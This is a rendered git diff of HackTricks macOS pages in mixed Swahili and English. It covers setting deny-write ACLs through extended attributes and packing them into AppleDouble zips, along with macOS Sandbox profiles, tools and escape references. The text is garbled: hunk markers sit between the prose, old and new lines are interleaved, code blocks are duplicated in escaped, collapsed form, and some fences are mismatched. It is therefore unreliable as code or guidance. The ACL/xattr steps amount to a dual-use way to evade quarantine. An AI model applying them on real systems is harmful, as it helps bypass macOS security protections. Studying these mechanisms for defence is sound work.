Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
\`\`\`bash rm -rf /tmp/test\* echo test >/tmp/test chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test ./get\_acls test ACL for test: !#acl 1 group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown
{% endhint %}
```bash
rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
./get_acls test
ACL for test:
!#acl 1
group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown
ACL in hex: \x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a
````
```
<details>
<summary>Kificho cha get_acls</summary>
<summary>Kanuni ya get_acls</summary>
```c
// gcc -o get_acls get_acls
#include <stdio.h>
@ -61,47 +67,103 @@ acl_free(acl);
acl_free(acl_text);
return 0;
}
````
\`\`\`bash # Lets add the xattr com.apple.xxx.xxxx with the acls mkdir start mkdir start/protected ./set\_xattr start/protected echo something > start/protected/something \`\`\`
```
</details>
```bash
# Lets add the xattr com.apple.xxx.xxxx with the acls
mkdir start
mkdir start/protected
./set_xattr start/protected
echo something > start/protected/something
```
<details>
<summary>Kodi ya set_xattr</summary>
<summary>Kanuni ya set_xattr</summary>
```c
// gcc -o set_xattr set_xattr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/xattr.h>
#include <sys/acl.h>
\`\`\`c // gcc -o set\_xattr set\_xattr.c #include #include #include #include #include
void print\_xattrs(const char \*filepath) { ssize\_t buflen = listxattr(filepath, NULL, 0, XATTR\_NOFOLLOW); if (buflen < 0) { perror("listxattr"); return; }
void print_xattrs(const char *filepath) {
ssize_t buflen = listxattr(filepath, NULL, 0, XATTR_NOFOLLOW);
if (buflen < 0) {
perror("listxattr");
return;
}
char \*buf = malloc(buflen); if (buf == NULL) { perror("malloc"); return; }
char *buf = malloc(buflen);
if (buf == NULL) {
perror("malloc");
return;
}
buflen = listxattr(filepath, buf, buflen, XATTR\_NOFOLLOW); if (buflen < 0) { perror("listxattr"); free(buf); return; }
buflen = listxattr(filepath, buf, buflen, XATTR_NOFOLLOW);
if (buflen < 0) {
perror("listxattr");
free(buf);
return;
}
printf("All current extended attributes for %s:\n", filepath); for (char \*name = buf; name < buf + buflen; name += strlen(name) + 1) { printf("%s: ", name); ssize\_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR\_NOFOLLOW); if (valuelen < 0) { perror("getxattr"); continue; }
printf("All current extended attributes for %s:\n", filepath);
for (char *name = buf; name < buf + buflen; name += strlen(name) + 1) {
printf("%s: ", name);
ssize_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR_NOFOLLOW);
if (valuelen < 0) {
perror("getxattr");
continue;
}
char \*value = malloc(valuelen + 1); if (value == NULL) { perror("malloc"); continue; }
char *value = malloc(valuelen + 1);
if (value == NULL) {
perror("malloc");
continue;
}
valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR\_NOFOLLOW); if (valuelen < 0) { perror("getxattr"); free(value); continue; }
valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR_NOFOLLOW);
if (valuelen < 0) {
perror("getxattr");
free(value);
continue;
}
value\[valuelen] = '\0'; // Null-terminate the value printf("%s\n", value); free(value); }
value[valuelen] = '\0'; // Null-terminate the value
printf("%s\n", value);
free(value);
}
free(buf); }
free(buf);
}
int main(int argc, char \*argv\[]) { if (argc != 2) { fprintf(stderr, "Usage: %s \n", argv\[0]); return 1; }
const char \*hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a"; const char \*filepath = argv\[1];
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "Usage: %s <filepath>\n", argv[0]);
return 1;
}
int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0); if (result == 0) { printf("Extended attribute set successfully.\n\n"); } else { perror("setxattr"); return 1; }
const char *hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a";
const char *filepath = argv[1];
print\_xattrs(filepath);
int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0);
if (result == 0) {
printf("Extended attribute set successfully.\n\n");
} else {
perror("setxattr");
return 1;
}
return 0; }
print_xattrs(filepath);
````
return 0;
}
```
</details>
<div data-gb-custom-block data-tag="code" data-overflow='wrap'>
{% code overflow="wrap" %}
```bash
# Create appledoublefile with the xattr entitlement
ditto -c -k start protected.zip
@ -115,10 +177,24 @@ rm -rf protected.zip
zip -r protected.zip protected ._protected
rm -rf protected
rm ._*
````
```
{% endcode %}
```bash
# Check if it worked
ditto -x -k --rsrc protected.zip .
xattr -l protected
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
\`\`\`bash # Check if it worked ditto -x -k --rsrc protected.zip . xattr -l protected \`\`\`
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

121
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
View file

@ -1,35 +1,36 @@
# Sanduku la macOS
# macOS Sandbox
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Sanduku la MacOS (awali lililoitwa Seatbelt) **linapunguza matumizi** yanayoendesha ndani ya sanduku kwa **vitendo vilivyoidhinishwa vilivyoelezwa katika wasifu wa Sanduku** ambao programu inaendeshwa nao. Hii husaidia kuhakikisha kwamba **programu itakuwa ikifikia rasilimali zinazotarajiwa tu**.
MacOS Sandbox (awali ilijulikana kama Seatbelt) **inaweka mipaka kwa programu** zinazotembea ndani ya sandbox kwa **vitendo vilivyokubaliwa vilivyobainishwa katika profaili ya Sandbox** ambayo programu inatumia. Hii husaidia kuhakikisha kwamba **programu itakuwa ikipata rasilimali zinazotarajiwa tu**.
Programu yoyote yenye **haki** ya **`com.apple.security.app-sandbox`** itatekelezwa ndani ya sanduku. **Faili za Apple** kawaida hutekelezwa ndani ya Sanduku na ili kuchapisha kwenye **Duka la App**, **haki hii ni lazima**. Kwa hivyo, programu nyingi zitatekelezwa ndani ya sanduku.
Programu yoyote yenye **entitlement** **`com.apple.security.app-sandbox`** itatekelezwa ndani ya sandbox. **Mifumo ya Apple** kwa kawaida hutekelezwa ndani ya Sandbox na ili kuchapishwa ndani ya **App Store**, **entitlement hii ni ya lazima**. Hivyo, programu nyingi zitatekelezwa ndani ya sandbox.
Ili kudhibiti kile mchakato unaweza au hauwezi kufanya, **Sanduku lina kitanzi** katika **syscalls** zote kwenye kernel. **Kulingana** na **haki** za programu, Sanduku itaruhusu vitendo fulani.
Ili kudhibiti kile mchakato unaweza au hawezi kufanya, **Sandbox ina vidokezo** katika **syscalls** zote kupitia kernel. **Kulingana** na **entitlements** za programu, Sandbox it **aruhusu** vitendo fulani.
Baadhi ya sehemu muhimu za Sanduku ni:
Baadhi ya vipengele muhimu vya Sandbox ni:
* **Kernel extension** `/System/Library/Extensions/Sandbox.kext`
* **Framework binafsi** `/System/Library/PrivateFrameworks/AppSandbox.framework`
* **Daemon** inayotumia userland `/usr/libexec/sandboxd`
* **Makontena** `~/Library/Containers`
* **kiongezeo cha kernel** `/System/Library/Extensions/Sandbox.kext`
* **mfumo wa faragha** `/System/Library/PrivateFrameworks/AppSandbox.framework`
* **daemon** inayotembea katika userland `/usr/libexec/sandboxd`
* **mifuko** `~/Library/Containers`
Ndani ya folda za makontena unaweza kupata **folda kwa kila programu inayotekelezwa kwenye sanduku** na jina la kitambulisho cha mfuko:
Ndani ya folda ya mifuko unaweza kupata **folda kwa kila programu inayotekelezwa sandboxed** yenye jina la bundle id:
```bash
ls -l ~/Library/Containers
total 0
@ -40,7 +41,7 @@ drwx------@ 4 username staff 128 Mar 25 14:14 com.apple.Accessibility-Settings
drwx------@ 4 username staff 128 Mar 25 14:10 com.apple.ActionKit.BundledIntentHandler
[...]
```
Ndani ya kila folda ya kitambulisho cha mfuko unaweza kupata **plist** na **Data directory** ya App:
Ndani ya kila folda ya bundle id unaweza kupata **plist** na **Data directory** ya App:
```bash
cd /Users/username/Library/Containers/com.apple.Safari
ls -la
@ -64,7 +65,7 @@ drwx------ 2 username staff 64 Mar 24 18:02 SystemData
drwx------ 2 username staff 64 Mar 24 18:02 tmp
```
{% hint style="danger" %}
Tafadhali kumbuka kwamba hata kama viungo vya ishara vipo hapo ili "kutoroka" kutoka kwenye Sanduku la Mchanga na kupata ufikiaji wa folda zingine, Programu bado inahitaji **kuwa na ruhusa** ya kuzifikia. Ruhusa hizi zipo ndani ya **`.plist`**.
Kumbuka kwamba hata kama symlinks zipo ili "kutoroka" kutoka Sandbox na kufikia folda nyingine, App bado inahitaji **kuwa na ruhusa** za kuzifikia. Ruhusa hizi ziko ndani ya **`.plist`**.
{% endhint %}
```bash
# Get permissions
@ -114,12 +115,12 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
[...]
```
{% hint style="warning" %}
Kila kitu kilichoundwa/kibadilishwa na programu iliyowekwa kwenye Sandboksi kitapata sifa ya **karantini**. Hii itazuia nafasi ya sandboksi kwa kuzindua Gatekeeper ikiwa programu ya sandboksi inajaribu kutekeleza kitu na **`open`**.
Kila kitu kilichoundwa/kilibadilishwa na programu ya Sandboxed kitapata **sifa ya karantini**. Hii itazuia nafasi ya sandbox kwa kuanzisha Gatekeeper ikiwa programu ya sandbox inajaribu kutekeleza kitu kwa **`open`**.
{% endhint %}
### Profaili za Sandboksi
### Profaili za Sandbox
Profaili za Sandboksi ni faili za usanidi ambazo zinaonyesha ni nini kitakachoruhusiwa/kukatazwa katika **Sandboksi** hiyo. Inatumia Lugha ya Profaili ya Sandboksi (SBPL), ambayo hutumia lugha ya programu ya [**Scheme**](https://en.wikipedia.org/wiki/Scheme\_\(programming\_language\)).
Profaili za Sandbox ni faili za usanidi zinazoonyesha kile kitakachokuwa **kuruhusiwa/kukatazwa** katika hiyo **Sandbox**. Inatumia **Sandbox Profile Language (SBPL)**, ambayo inatumia lugha ya programu ya [**Scheme**](https://en.wikipedia.org/wiki/Scheme\_\(programming\_language\)).
Hapa unaweza kupata mfano:
```scheme
@ -140,37 +141,28 @@ Hapa unaweza kupata mfano:
)
```
{% hint style="success" %}
Angalia [**utafiti**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **ili kuangalia hatua zaidi ambazo zinaweza kuruhusiwa au kukataliwa.**
Check this [**research**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **ili kuangalia vitendo zaidi ambavyo vinaweza kuruhusiwa au kukataliwa.**
{% endhint %}
**Huduma muhimu za mfumo** pia zinaendeshwa ndani ya **sandbox yao ya kawaida** kama huduma ya `mdnsresponder`. Unaweza kuona maelezo ya **sandbox maalum** haya ndani ya:
Mifumo muhimu ya **huduma** pia inafanya kazi ndani ya **sandbox** yake maalum kama huduma ya `mdnsresponder`. Unaweza kuona hizi **profiles za sandbox** maalum ndani ya:
* **`/usr/share/sandbox`**
* **`/System/Library/Sandbox/Profiles`**&#x20;
* Maelezo mengine ya sandbox yanaweza kuangaliwa katika [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
* Profiles nyingine za sandbox zinaweza kuangaliwa katika [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
Programu za **Duka la App** hutumia **maelezo ya sandbox** **`/System/Library/Sandbox/Profiles/application.sb`**. Unaweza kuangalia katika maelezo haya jinsi idhini kama vile **`com.apple.security.network.server`** inavyoruhusu mchakato kutumia mtandao.
Programu za **App Store** zinatumia **profile** **`/System/Library/Sandbox/Profiles/application.sb`**. Unaweza kuangalia katika profile hii jinsi haki kama **`com.apple.security.network.server`** inavyoruhusu mchakato kutumia mtandao.
SIP ni maelezo ya sandbox yanayoitwa platform\_profile katika /System/Library/Sandbox/rootless.conf
SIP ni profile ya Sandbox inayoitwa platform\_profile katika /System/Library/Sandbox/rootless.conf
### Mifano ya Maelezo ya Sandbox
### Mifano ya Profile ya Sandbox
Ili kuanza programu na **maelezo ya sandbox maalum**, unaweza kutumia:
Ili kuanzisha programu na **profile maalum ya sandbox** unaweza kutumia:
```bash
sandbox-exec -f example.sb /Path/To/The/Application
```
{% tabs %}
{% tab title="touch" %}
{% code title="touch.sb" %}
```plaintext
(version 1)
(deny default)
(allow file-read-metadata)
(allow file-write-metadata)
(allow file-read-data (literal "/path/to/file"))
(allow file-write-data (literal "/path/to/file"))
```
This is a simple example of a sandbox profile for the `touch` command. It allows the command to read and write metadata and data for a specific file located at `/path/to/file`. All other operations are denied by default.
```scheme
(version 1)
(deny default)
@ -203,6 +195,8 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
; 2023-05-26 13:44:59.840050+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) sysctl-read kern.bootargs
; 2023-05-26 13:44:59.840061+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data /
```
{% endcode %}
{% code title="touch3.sb" %}
```scheme
(version 1)
@ -217,10 +211,10 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
{% endtabs %}
{% hint style="info" %}
Tafadhali kumbuka kuwa **programu** iliyoundwa na **Apple** inayofanya kazi kwenye **Windows** **haina tahadhari za ziada za usalama**, kama vile sandboxing ya programu.
Kumbuka kwamba **programu** **iliyoundwa na Apple** inayofanya kazi kwenye **Windows** **haina tahadhari za ziada za usalama**, kama vile sandboxing ya programu.
{% endhint %}
Mifano ya kuvuka:
Mifano ya kupita:
* [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
* [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (wanaweza kuandika faili nje ya sandbox ambayo jina lake linaanza na `~$`).
@ -229,38 +223,38 @@ Mifano ya kuvuka:
macOS inahifadhi profaili za sandbox za mfumo katika maeneo mawili: **/usr/share/sandbox/** na **/System/Library/Sandbox/Profiles**.
Na ikiwa programu ya mtu wa tatu ina kibali cha _**com.apple.security.app-sandbox**_, mfumo unatumia profaili ya **/System/Library/Sandbox/Profiles/application.sb** kwa mchakato huo.
Na ikiwa programu ya upande wa tatu ina _**com.apple.security.app-sandbox**_ haki, mfumo unatumia profaili ya **/System/Library/Sandbox/Profiles/application.sb** kwa mchakato huo.
### **Profaili ya Sandbox ya iOS**
Profaili ya chaguo-msingi inaitwa **container** na hatuna uwakilishi wa maandishi wa SBPL. Kumbukumbu, sandbox hii inawakilishwa kama mti wa kibinari wa Ruhusu/Kataa kwa kila idhini kutoka kwenye sandbox.
Profaili ya chaguo-msingi inaitwa **container** na hatuna uwakilishi wa maandiko ya SBPL. Katika kumbukumbu, sandbox hii inawakilishwa kama mti wa binary wa Ruhusu/Kataa kwa kila ruhusa kutoka kwenye sandbox.
### Kuchunguza na Kuvuka Sandbox
### Debug & Bypass Sandbox
Kwenye macOS, tofauti na iOS ambapo michakato inawekwa kwenye sandbox tangu mwanzo na kernel, **michakato lazima ijiunge na sandbox yenyewe**. Hii inamaanisha kuwa kwenye macOS, mchakato hauna kizuizi cha sandbox mpaka uamue kuingia ndani yake.
Katika macOS, tofauti na iOS ambapo michakato inasandboxed tangu mwanzo na kernel, **michakato lazima ijitolee kwenye sandbox yenyewe**. Hii inamaanisha katika macOS, mchakato haujawekewa vizuizi na sandbox hadi uamuzi wa kuingia ndani yake ufanyike.
Michakato inawekwa kwenye Sandbox kiotomatiki kutoka kwa userland wanapoanza ikiwa wana kibali: `com.apple.security.app-sandbox`. Kwa maelezo zaidi juu ya mchakato huu angalia:
Michakato inasandboxed kiotomatiki kutoka kwa userland wanapoanza ikiwa wana haki: `com.apple.security.app-sandbox`. Kwa maelezo ya kina kuhusu mchakato huu angalia:
{% content-ref url="macos-sandbox-debug-and-bypass/" %}
[macos-sandbox-debug-and-bypass](macos-sandbox-debug-and-bypass/)
{% endcontent-ref %}
### **Angalia Uwezo wa PID**
### **Angalia Haki za PID**
[**Kulingana na hii**](https://www.youtube.com/watch?v=mG715HcDgO8\&t=3011s), **`sandbox_check`** (ni `__mac_syscall`), inaweza kuangalia **kama operesheni inaruhusiwa au la** na sandbox katika PID fulani.
[**Zana ya sbtool**](http://newosxbook.com/src.jl?tree=listings\&file=sbtool.c) inaweza kuangalia ikiwa PID inaweza kutekeleza hatua fulani:
[**chombo sbtool**](http://newosxbook.com/src.jl?tree=listings\&file=sbtool.c) kinaweza kuangalia ikiwa PID inaweza kufanya kitendo fulani:
```bash
sbtool <pid> mach #Check mac-ports (got from launchd with an api)
sbtool <pid> file /tmp #Check file access
sbtool <pid> inspect #Gives you an explaination of the sandbox profile
sbtool <pid> all
```
### SBPL ya kawaida katika programu za Duka la App
### Custom SBPL in App Store apps
Inawezekana kwa makampuni kuunda programu zao zifanye kazi **na maelezo ya SBPL ya kawaida** (badala ya ile ya msingi). Wanahitaji kutumia ruhusa ya **`com.apple.security.temporary-exception.sbpl`** ambayo inahitaji idhini kutoka kwa Apple.
Inawezekana kwa kampuni kufanya programu zao zifanye kazi **na wasifu wa Sandbox wa kawaida** (badala ya ule wa kawaida). Wanahitaji kutumia haki **`com.apple.security.temporary-exception.sbpl`** ambayo inahitaji kuidhinishwa na Apple.
Inawezekana kuangalia ufafanuzi wa ruhusa hii katika **`/System/Library/Sandbox/Profiles/application.sb:`**
Inawezekana kuangalia ufafanuzi wa haki hii katika **`/System/Library/Sandbox/Profiles/application.sb:`**
```scheme
(sandbox-array-entitlement
"com.apple.security.temporary-exception.sbpl"
@ -268,18 +262,19 @@ Inawezekana kuangalia ufafanuzi wa ruhusa hii katika **`/System/Library/Sandbox/
(let* ((port (open-input-string string)) (sbpl (read port)))
(with-transparent-redirection (eval sbpl)))))
```
Hii ita **eval string baada ya haki ya kumiliki** kama profile ya Sandbox.
Hii itafanya **eval string baada ya haki hii** kama profaili ya Sandbox.
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

50
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md
View file

@ -1,22 +1,23 @@
# Uchunguzi wa Sanduku la Kimsingi la macOS
# macOS Default Sandbox Debug
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
